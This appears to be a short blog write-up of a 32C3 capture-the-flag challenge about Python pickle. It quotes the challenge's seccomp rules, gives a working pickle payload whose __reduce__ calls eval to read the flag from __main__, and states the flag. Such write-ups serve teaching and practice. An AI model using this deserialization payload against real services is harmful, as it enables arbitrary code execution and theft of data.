This challenge is about python pickle. The remote script fetches the flag as below:
class Flag(object):
def __init__(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.17.0.1", 1234))
self.flag = s.recv(1024).strip()
s.close()
flag = Flag()
Once the Flag class is instantiated, seccomp is used to restrict many of syscalls eg. socket calls used in Flag class won't work
f = SyscallFilter(KILL) f.add_rule_exactly(ALLOW, "read") f.add_rule_exactly(ALLOW, "write", Arg(0, EQ, sys.stdout.fileno())) f.add_rule_exactly(ALLOW, "write", Arg(0, EQ, sys.stderr.fileno())) f.add_rule_exactly(ALLOW, "close") f.add_rule_exactly(ALLOW, "exit_group") f.add_rule_exactly(ALLOW, "open", Arg(1, EQ, 0)) f.add_rule_exactly(ALLOW, "stat") f.add_rule_exactly(ALLOW, "lstat") f.add_rule_exactly(ALLOW, "lseek") f.add_rule_exactly(ALLOW, "fstat") f.add_rule_exactly(ALLOW, "getcwd") f.add_rule_exactly(ALLOW, "readlink") f.add_rule_exactly(ALLOW, "mmap", Arg(3, MASKED_EQ, 2, 2)) f.add_rule_exactly(ALLOW, "munmap")But since the flag is already present in the scope of __main__, we can fetch it using the below pickle payload
class payload(object):
def __reduce__(self):
return (eval, ("__import__('__main__').flag.flag",))
sploit = pickle.dumps(payload())
Flag for the challenge is 32c3_rooDahPaeR3JaibahYeigoong
No comments :
Post a Comment